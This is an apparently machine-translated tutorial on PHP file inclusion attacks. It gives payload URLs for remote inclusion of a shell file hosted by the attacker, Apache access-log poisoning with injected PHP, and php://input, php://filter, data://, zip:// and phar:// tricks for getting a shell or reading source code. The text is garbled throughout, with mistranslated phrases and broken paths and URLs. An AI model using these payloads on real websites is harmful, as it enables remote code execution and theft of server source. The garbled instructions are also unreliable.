File contains (regardless of suffix) Apache log remote file contains PHP encapsulated pseudo protocol:

1. The local file contains ：（ Ignore suffix ）

2. The remote file contains

Remote contains shellallow_url_include Turn on

visit : http:// Target machine ip/index.php?page=http:// Operator ip/shell.txt

Target machine ：

Operator ：

3.apache Log file contains individuals get.shell

Modify file httpd.conf

# CustomLog "logs/access.log" common Remove the front one # Restart No apache

visit http;//127.0.0.1:8070/00/include.php/<?php phpinfo();?>

adopt Burp Suite Grab the bag

Then include the log file http://127.0.0.1/00/include.php?page=D:\softt\PHPTutorialApache\ogslaccess.log

4.php Encapsulate pseudo protocol ：

 (1) php://input

php://input|/ Commands can be executed via the input stream pseudo Protocol ,getshell

http://127.0.0.1/00 /include.php?page=php:// input

adopt Burp Suite Grab the bag

add to <?php phpinfo();?>

write in shell

(2) filter://

Read the source code

php://filter// adopt base64 Code to read the source code of the page

http://127.0.0.1/00/include.php?page=php://filter/read=convert.base64-encode/resource=include.php

resource=() This content is your goal. You can take the path to read the source code content of the page you want

(3)zip:// Write a first test.txt

Compress

(4) data://

Command execution （php Version greater than or equal to 5.2,allow_url_include and allow_url_fopen All for on The state of )?

page=data://text/plain,<?php phpinfo();?>

?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

(5) phar://

Use posture :

If there is a file test.txt, Pack it up zip Compressed package , Specify the absolute path （ Or use relative paths ）

?page=phar:// D:\phpStudy\PHPTutorial\WWW\00 /test.zip/test.txt or

?page=phar:// D:\phpStudy\PHPTutorial\WWW\00 /test.jpg/test.txt